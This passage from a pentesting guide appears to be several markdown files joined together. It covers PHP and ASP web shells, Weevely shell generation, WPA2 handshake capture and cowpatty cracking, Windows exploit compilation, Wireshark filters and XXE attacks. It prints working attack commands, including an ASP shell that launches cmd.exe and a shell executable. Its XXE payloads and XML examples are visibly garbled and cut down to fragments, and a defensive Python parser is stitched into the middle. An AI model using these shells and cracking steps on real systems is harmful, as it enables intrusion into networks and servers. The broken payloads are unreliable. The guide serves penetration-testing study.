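On a real tree you would feed `scan_files` with the contents of every `.php` under the web root and review the hits by hand, since legitimate admin tooling can match too.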

```php
# I have had to use this one
```

### Obfuscation

The following functions can be used to obfuscate the code:

```
eval()
assert()
base64_encode() / base64_decode()
gzdeflate()
str_rot13()
```

### Weevely - Incredible tool!

Using weevely we can create PHP webshells easily:

```
weevely generate password /root/webshell.php
```

Now we execute it and get a shell in return:

```
weevely "http://192.168.1.101/webshell.php" password
```

## ASP

```
<%
Dim oS
On Error Resume Next
Set oS = Server.CreateObject("WSCRIPT.SHELL")
Call oS.Run("win.com cmd.exe /c c:\Inetpub\shell443.exe",0,True)
%>
```

## References

http://www.acunetix.com/blog/articles/keeping-web-shells-undercover-an-introduction-to-web-shells-part-3/
http://www.binarytides.com/web-shells-tutorial/

--------------------------------------------------------------------------------
/wep.md:
--------------------------------------------------------------------------------

https://raw.githubusercontent.com/pha5matis/Pentesting-Guide/4671581eda94ae4a951362805a06049ebd3d51c8/wep.md

--------------------------------------------------------------------------------
/wget.md:
--------------------------------------------------------------------------------

# wget

Wget is just an incredibly useful tool. It can be used to download files.

If you need to use wget through a proxy you can do the following:

```
wget "http://example.com/get_album_item.php?size=version%28%29%20;%20--" -O output.txt -e use_proxy=yes -e http_proxy=192.168.101.8:3128 --proxy-user "username" --proxy-password "password"
```

--------------------------------------------------------------------------------
/wifi.md:
--------------------------------------------------------------------------------

# Wifi

There are quite a few different security mechanisms on wifi, and each of them requires a different tactic. This article outlines the different strategies quite well: http://null-byte.wonderhowto.com/how-to/hack-wi-fi-selecting-good-wi-fi-hacking-strategy-0162526/

This is a great guide to the many different ways to hack wifi.

### Checking what networks are available

`sudo iwlist wlan0 scanning` - scans for wifi networks

### Hacking WPA2-wifis Using airmon-ng and cowpatty

What we are going to do here is basically just to record the 4-way handshake and then run a dictionary attack on it. The good part about this strategy is that you won't have to interfere too much with the network and thereby risk taking down their wifi. The bad part is that if you run a dictionary attack there is always the possibility that the password just isn't in the list.

1. Start airmon-ng
   - `airmon-ng start wlan0`
   - This puts the network card in monitoring mode.
   - This will create a network interface that you can use to monitor wifi traffic. This interface is usually called mon0 or something like that. You see the name when you run the command.

2. Run airodump to see what is passing through the air
   - Now we want to see what access points are available to us.
   - `airodump-ng -i mon0`
   - This would output something like this:

```
CH 13 ][ Elapsed: 6 s ]

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

E8:DE:27:31:15:EE  -62       40       54    0  11  54e  WPA2 CCMP   PSK  myrouter
A7:B6:68:D4:1D:91  -80        7        0    0  11  54e  WPA2 CCMP   PSK  DKT_D24D81
B4:EE:B4:80:76:72  -84        5        0    0   6  54e  WPA2 CCMP   PSK  arrisNetwork

BSSID              STATION            PWR   Rate    Lost    Frames  Probe

E8:DE:27:31:15:EE  D8:A2:5E:8E:41:75  -57    0e- 1    537        14
```

So what is all this?

`BSSID` - This is the MAC address of the access point.
`PWR` - Signal strength. The closer to 0, the stronger the signal. In the example above it is myrouter that has the strongest signal.
`Beacons` - A beacon is kind of like a packet that the AP sends out periodically. It contains information about the network: the SSID, timestamp and beacon interval. If you are curious you can just analyze the beacons in Wireshark after you have captured them.
`#Data` - The number of data packets that have been sent.
`#/s` - Number of data packets per second.
`CH` - Channel
`MB` - Maximum speed the AP can handle.
`ENC` - Encryption type
`CIPHER` - One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory, but TKIP is typically used with WPA and CCMP is typically used with WPA2.
`PSK` - The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for WEP).
`ESSID` - The name of the network

Then we have another section of information.
`Station` - MAC address of each associated station, or of stations searching for an AP to connect with. Clients not currently associated with an AP have a BSSID of "(not associated)". So yeah, this basically means that we can see what devices are looking for APs.
This can be useful if we want to create an evil twin or something like that.

3. Find the network you want to access.
   - `airodump-ng --bssid A7:B6:68:D4:1D:91 -c 11 -w cowpatty mon0`
   - So this command will record all traffic from the device with that specific MAC address. `-c` defines the channel, and `-w cowpatty` means that we are going to save the packet capture with that name.
   Now we just have to wait for a user to connect to that network. When he/she does, we will record that handshake.
   We know that we have recorded a handshake when this appears:
   `CH 11 ][ Elapsed: 19 hours 52 mins ][ 2016-05-19 17:14 ][ WPA handshake: A7:B6:68:D4:1D:91`
   Now we can exit airodump, and we can see that we have a cap file with the name cowpatty-01.cap. That is our packet capture, and you can open it and study it in Wireshark if you like.

4. Crack the password.
   - Now that we have the handshake recorded we can start to crack it. We can do that by using the program cowpatty.
   - `cowpatty -f /usr/share/wordlists/rockyou.txt -r cowpatty-01.cap -s DKT_D24D81`
   Then we just hope for the best.

## More

Kicking other people off the network to capture handshakes faster:
http://www.aircrack-ng.org/doku.php?id=newbie_guide

http://lewiscomputerhowto.blogspot.cl/2014/06/how-to-hack-wpawpa2-wi-fi-with-kali.html

http://radixcode.com/hackcrack-wifi-password-2015-step-step-tutorial/

--------------------------------------------------------------------------------
/windows.md:
--------------------------------------------------------------------------------

# Windows

Whether you like it or not, Windows is the most common OS for desktop users in the world. So for a pentester it is fundamental to understand the ins and outs of it.

So this chapter will contain some basics about Windows and Windows networks.

We will also look a bit at PowerShell and of course the good old CMD.

--------------------------------------------------------------------------------
/windows_exploitation.md:
--------------------------------------------------------------------------------

# Windows exploitation

If you want to exploit a service on a Windows machine but you are using Linux, you can compile and run the exploit from Linux, like this:

```
i686-w64-mingw32-gcc exploit.c -o exploit.exe
```

Then run it like this:

```
wine exploit.exe
```

--------------------------------------------------------------------------------
/wireshark.md:
--------------------------------------------------------------------------------

# Wireshark

So now that you have entered a network and intercepted the traffic, it is time to analyze that traffic. That can be done with Wireshark.

## Filters

There are two types of filters that we can use.
1. Capture filter
   - This filters during the capture process, so that it does not capture what you have not specified.
2. Display filter
   - This filter just filters what you see. You might have captured 1000 packets, but using the display filter you will only be shown, say, the 100 packets that are relevant to you.

The syntax for the two filters is a bit different.

### Capture filter

So if you just start capturing all traffic on a network you are soon going to get stuck with a ton of packets. Too many! So we might need to refine our capture.

Click on the fourth icon from the left. If you hover over it, it says `Capture options`.

Some useful ones might be:
From a specific host and with a specific port:
```
host 192.168.1.102
port 110
```

### Display filter

Show only packets used by this IP address, or to a specific port:
```
ip.addr == 192.168.1.102
tcp.port eq 25
```

### Automatically resolve ip-addresses

Easy:
https://ask.wireshark.org/questions/37680/can-wireshark-automatically-resolve-the-ip-address-into-host-names

--------------------------------------------------------------------------------
/wps.md:
--------------------------------------------------------------------------------

# WPS

--------------------------------------------------------------------------------
/write_exploits.md:
--------------------------------------------------------------------------------

# Write exploits

If you want to write or port an exploit to Metasploit, this is how you can do it.

--------------------------------------------------------------------------------
/xml_external_entity_attack.md:
--------------------------------------------------------------------------------

# XML External Entity Attack

With this attack you can do:

* Read local files
* Denial-of-service
* Perform port-scan
* Remote Code Execution

Where do you find it:

* Anywhere where XML is posted.

* Common with file-uploading functionality, for file types that use XML, like docx, pptx, gpx, pdf and xml itself.

### Background XML

XML is a markup language, like HTML. Unlike HTML it does not have any predefined tags: it is the user that creates the tags in the XML object. XML is just a format for storing and transporting data. XML uses tags and subtags, just like HTML, or parents, children, and siblings. So in that sense it has the same tree structure as HTML.

To define an XML section/document you need the following tag to begin:

```

```

Example of valid XML:

```

Hello World

```

[https://www.owasp.org/index.php/XML\_External\_Entity\_\(XXE\)\_Processing](https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing)

### Syntax rule

* Must have root element
* Must have XML prolog

```

```

* All elements must have closing tag
* Tags are case-sensitive
* XML attributes must be quoted
* Special characters must be escaped correctly.

| Escaped | Character | Name |
| :--- | :--- | :--- |
| `&lt;` | < | less than |
| `&gt;` | > | greater than |
| `&amp;` | & | ampersand |
| `&apos;` | ' | apostrophe |
| `&quot;` | " | quotation mark |

* Whitespace is preserved in XML

### Attack

So if an application receives XML on the server, the attacker might be able to exploit an XXE. It could be sent as a GET, but it is more likely that it is sent in a POST. An attack might look like this:

```
]>&xxe;
```

The element can be whatever, it doesn't matter. The `xxe` is the "variable" where the content of /dev/random gets stored, and by dereferencing it in the foo tag the content gets output. This way an attacker might be able to read files from the local system, like boot.ini or passwd. SYSTEM means that what is to be included can be found locally on the filesystem.

In PHP applications where the expect module is loaded it is possible to get RCE. It is not a very common vulnerability, but still good to know.

```
]>
&xxe;
mypass
```

Even if the data is not reflected back to the website it is still possible to exfiltrate files and data from the server. The technique is similar to how you exfiltrate the cookie in a Cross-Site Scripting attack: you send it in the URL.
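How a server can refuse the kind of payload described above, as an added example that is not from the original guide: the hardened parser hooks expat's DOCTYPE callback and aborts before any entity can be declared, and it is compared against the stock `xml.etree` parser, which happily expands the internal "testdata" probe from the Test for it section. The XML documents and the `dtd-host.invalid` hostname are constructed samples.

```python
# Added example (not from the original guide): reject every DTD so that an XXE
# payload never reaches entity expansion, and compare with the stock parser.
import xml.etree.ElementTree as ET
import xml.parsers.expat


class DoctypeRejected(ValueError):
    """Raised when untrusted XML carries a DOCTYPE (and so could declare entities)."""


def _reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
    # Fires as soon as expat sees <!DOCTYPE ...>, before any <!ENTITY> is read.
    raise DoctypeRejected(f"DOCTYPE {doctype_name!r} not allowed in untrusted XML")


def parse_untrusted_xml(data):
    """Parse bytes/str into an ElementTree element, refusing every DTD.

    Without a DTD there is nowhere to declare an entity, so neither local file
    reads (SYSTEM "file:///...") nor callbacks to an external host
    (SYSTEM "http://...") are possible, and there is nothing to expand.
    """
    builder = ET.TreeBuilder()
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _reject_doctype
    # Second line of defence: never pull in external parameter entities.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data
    parser.Parse(data, True)
    return builder.close()


def parse_result(parse, data):
    """Run one parser and report ("ok", root text) or ("rejected", error type)."""
    try:
        root = parse(data)
    except (DoctypeRejected, ET.ParseError, xml.parsers.expat.ExpatError) as exc:
        return ("rejected", type(exc).__name__)
    return ("ok", root.text)


def compare_parsers(data):
    """Same document through the stock xml.etree parser and the hardened one."""
    return {
        "stock": parse_result(ET.fromstring, data),
        "hardened": parse_result(parse_untrusted_xml, data),
    }


# Constructed sample documents.
BENIGN = b'<?xml version="1.0" encoding="UTF-8"?><root><greeting>Hello World</greeting></root>'
# The reflection probe from the "Test for it" section: a harmless internal entity.
PROBE = b'<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe "testdata">]><foo>&xxe;</foo>'
# An external DTD reference; dtd-host.invalid is a placeholder, nothing is contacted.
EXTERNAL_DTD = b'<!DOCTYPE foo SYSTEM "http://dtd-host.invalid/x.dtd"><foo>bar</foo>'

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN), ("probe", PROBE), ("external dtd", EXTERNAL_DTD)):
        print(name, compare_parsers(doc))
```

If the stock parser reflects "testdata" for the probe, that is the same signal the guide uses to say an endpoint is vulnerable; the hardened parser rejects the document before the entity is ever seen.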

### Test for it

* Input is reflected

```
]>&xxe;
```

If "testdata" gets reflected then it is vulnerable to XXE. If it gets reflected you can try to exfiltrate the data the following way:

```
]>&xxe;
```

Another way to test it is to see if the server tries to download the external script. First you need to set up your own web server, and then wait for it to connect.

```
]>&xxe;
```

### Exfiltrate data through URL

https://blog.bugcrowd.com/advice-from-a-researcher-xxe/

### References

[https://securitytraning.com/xml-external-entity-xxe-xml-injection-web-for-pentester/](https://securitytraning.com/xml-external-entity-xxe-xml-injection-web-for-pentester/)

[https://blog.bugcrowd.com/advice-from-a-researcher-xxe/](https://blog.bugcrowd.com/advice-from-a-researcher-xxe/)

http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html

--------------------------------------------------------------------------------